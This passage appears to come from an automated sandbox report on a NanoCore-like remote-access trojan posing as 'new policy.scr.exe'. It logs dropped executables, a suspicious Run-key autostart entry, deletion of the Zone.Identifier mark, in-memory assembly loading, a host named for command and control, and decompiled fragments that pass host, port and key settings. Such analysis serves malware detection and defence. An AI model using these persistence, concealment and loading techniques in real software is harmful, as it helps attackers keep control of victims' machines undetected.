Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Section loaded: gpapi.dll

Source: C:\Users\user\Desktop\new policy.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\new policy.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: new policy.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: new policy.scr.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: new policy.scr.exe

Static file information: File size 2360320 > 1048576

Source: new policy.scr.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x22f000

Source: new policy.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp, Networks!.exe, 00000006.00000002.2239294193.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp, Networks!.exe, 00000006.00000002.2239294193.0000000005FB3000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000006.00000002.2215379715.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, Networks!.exe, 00000007.00000002.2303284343.00000000029B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\ARM\Desktop\ncsource\Plugins\CorePlugin\CoreClientPlugin\obj\Release\CoreClientPlugin.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: new policy.scr.exe, ParamCreatorObject.cs	.Net Code: MapSingleton System.AppDomain.Load(byte[])
Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: airlineagancy.casacam.net 7076.exe.0.dr, Messages.cs	.Net Code: Memory
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.new policy.scr.exe.4ed2b40.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 6.2.Networks!.exe.4a592f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Networks!.exe.46792f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.5af0000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.4d192f0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.4af4e70.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.new policy.scr.exe.49e0650.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2303284343.000000000297D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1884977634.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2324492421.0000000004679000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2215379715.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2232333043.0000000004A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1869683888.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: new policy.scr.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_059EB76B pushfd ; retf	0_2_059EB76E
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05BFD170 push 8B6C5ADFh; iretd	0_2_05BFD175
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05BFD320 pushad ; retf	0_2_05BFD321
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05C0328E push edi; iretd	0_2_05C03291
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05D570FA push eax; retf	0_2_05D570FB
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 0_2_05E67F92 push 00000031h; retf	0_2_05E67F94
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588D88F push DA0588D1h; ret	3_2_0588D8C9
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_0588D8CB push ss; ret	3_2_0588D8D1
Source: C:\Users\user\Desktop\new policy.scr.exe	Code function: 3_2_07757F28 push esp; ret	3_2_07757F29
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_02B546C4 push edx; iretd	6_2_02B546D2
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05A2B76B pushfd ; retf	6_2_05A2B76E
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05C3D170 push 8B6C56DFh; iretd	6_2_05C3D175
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05C3D320 pushad ; retf	6_2_05C3D321
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05C4328E push edi; iretd	6_2_05C43291
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 6_2_05D970FA push eax; retf	6_2_05D970FB
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_00F146BF push edx; iretd	7_2_00F146D2
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05590D72 push eax; iretd	7_2_05590D1D
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055DB76B pushfd ; retf	7_2_055DB76E
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057ED170 push 8B6C9BDFh; iretd	7_2_057ED175
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057ED320 pushad ; retf	7_2_057ED321
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057F328E push edi; iretd	7_2_057F3291
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_059470FA push eax; retf	7_2_059470FB
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 9_2_05A073CD push FFFFFF8Bh; iretd	9_2_05A073CF

Drops PE files

Source: C:\Users\user\Desktop\new policy.scr.exe	File created: C:\Users\user\AppData\Roaming\Networks!.exe			Jump to dropped file
Source: C:\Users\user\Desktop\new policy.scr.exe	File created: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe			Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\Desktop\new policy.scr.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Networks!

Jump to behavior

Source: C:\Users\user\Desktop\new policy.scr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Networks!			Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Networks!			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\new policy.scr.exe

File opened: C:\Users\user\Desktop\new policy.scr.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new policy.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
